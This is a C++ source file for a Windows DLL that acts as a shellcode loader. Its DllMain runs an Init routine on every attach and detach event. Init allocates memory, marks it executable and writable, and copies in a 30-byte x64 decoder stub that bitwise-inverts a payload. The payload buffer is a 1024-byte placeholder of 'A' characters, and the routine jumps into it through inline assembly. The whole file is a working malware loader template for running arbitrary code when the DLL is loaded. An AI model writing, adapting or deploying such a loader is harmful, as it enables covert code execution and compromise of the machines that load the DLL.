#include "maindll.h"

#define SHELLCODE_SIZE 1024
#define DECODER_SIZE 30
BOOL bExec = FALSE;
void DLL_EXPORT Init()
{   DWORD dwSize;

    if(!bExec) {
        bExec++;

        CHAR payload[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	CHAR decoder[] = "\xe8\x00\x00\x00\x00\x5b\x48\x31\xc0\x48\x89\xc1\xb1\x80\x48\x83\xc3\x11\x48\xf7\x14\xcb\xe2\xfa\x48\x83\xc3\x08\x53\xc3";
        VOID *mem = VirtualAlloc(NULL, DECODER_SIZE + SHELLCODE_SIZE, 0x00002000 | 0x00001000, PAGE_READWRITE); // memory is read / write
        VirtualProtect(mem, DECODER_SIZE + SHELLCODE_SIZE, 0x40, &dwSize); // Change memory permission to PAGE_EXECUTE_READWRITE
        memcpy(mem, decoder, DECODER_SIZE);
	memcpy(mem + DECODER_SIZE, payload, SHELLCODE_SIZE);

        asm volatile ("mov %0, %%rcx\n\t"
                     "push %%rcx\n\t"
                     "ret"
                     :
                     : "r" (mem));
    }
    // impossible to reach because of the shellcode gadget.
}

extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            Init();
            // attach to process
            // return FALSE to fail DLL load
            break;

        case DLL_PROCESS_DETACH:
            Init();
            // detach from process
            break;

        case DLL_THREAD_ATTACH:
            Init();
            // attach to thread

            break;

        case DLL_THREAD_DETACH:
            Init();
            // detach from thread
            break;
    }
    return TRUE; // succesful
}
